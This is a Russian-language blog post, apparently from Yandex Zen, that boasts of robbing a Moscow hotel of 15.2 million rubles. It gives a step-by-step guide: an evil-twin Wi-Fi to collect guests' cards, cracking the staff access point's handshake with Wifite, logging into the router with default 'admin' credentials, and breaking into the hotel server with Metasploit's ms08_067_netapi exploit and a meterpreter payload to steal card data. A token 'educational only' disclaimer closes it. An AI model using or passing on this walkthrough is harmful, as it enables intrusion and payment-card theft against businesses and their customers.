Найти в Дзене
ⁱⁿᶠⁱⁿⁱᵗʸIᵒᶠᶠᶦᶜᶦᵃᶫ
10 подписчиков

Обнесли отель на 15.200.000₽

1
1 мин
Начинаем В начале вылазки мы расположились в кафе, прилегающем к одному достаточно популярному отелю в центре Мск. Наша идея заключалась в следующем: глушим бесплатный Wi-Fi от отеля и создаем нашего двойника с таким же названием и естественно без пароля! Стоит сказать, что все удалось, но результат не особо радовал - всего 4 карты за 6,5 часов. Поняв, что большинство людей здесь не расплачиваются картой через интернет, мы решили пойти совсем другим путем, о нем и будет сегодняшняя статья. Что касается сути нашей идеи, тут все достаточно просто: Теперь на практике Для начала чистим файл хэндейшка от мусора, затем расшифровываем его и получаем пароль. Пароль админки на роутере оказался таким же, как и пароль от самой точки. А логин... Внимание... admin. Нашли. Доступ мы будем получать через exploit. В терминале мы пишем: "msfconsole" "nmap -v 192.168..... (айпи сервера) "search netapi"
и "exploit/windows/smb/ms08_067_netapi"
"show options"
"set RHOST (ip)"
"show payloads"
"set payloa
Оглавление

Начинаем

В начале вылазки мы расположились в кафе, прилегающем к одному достаточно популярному отелю в центре Мск. Наша идея заключалась в следующем: глушим бесплатный Wi-Fi от отеля и создаем нашего двойника с таким же названием и естественно без пароля! Стоит сказать, что все удалось, но результат не особо радовал - всего 4 карты за 6,5 часов. Поняв, что большинство людей здесь не расплачиваются картой через интернет, мы решили пойти совсем другим путем, о нем и будет сегодняшняя статья.

Что касается сути нашей идеи, тут все достаточно просто:

  • Взломать сервер отеля;
  • Достать с него данные банковских карт.

Теперь на практике

  • Взламываем Wi-Fi точку доступа, предназначенную для сотрудников.
    Используя Kali Linux и простейший, предустановленный Wifite. Перехватываем рукопожатие и расшифровываем его.

Для начала чистим файл хэндейшка от мусора, затем расшифровываем его и получаем пароль.

Пароль админки на роутере оказался таким же, как и пароль от самой точки. А логин... Внимание... admin.

  • Попадаем в настройки роутера и чекаем ip сервера.

Нашли.

  • Далее нам понадобится винда и сканер портов Nmap.

Доступ мы будем получать через exploit.

В терминале мы пишем:

"msfconsole" "nmap -v 192.168..... (айпи сервера) "search netapi"
и "exploit/windows/smb/ms08_067_netapi"
"show options"
"set RHOST (ip)"
"show payloads"
"set payload windows/meterpreter/bind_tcp"
"show options"
"exploid"

Всё! Мы получили доступ к серверу

"shell" - cmd жертвы.

Дальше мы просто устанавливаем нужный софт и все данные текут прямо нам в руки.

Данная статья представлена исключительно в ознакомительных целях и не несёт призыва к действию. Вся информация направлена на то, чтобы уберечь читателей от противозаконных действий.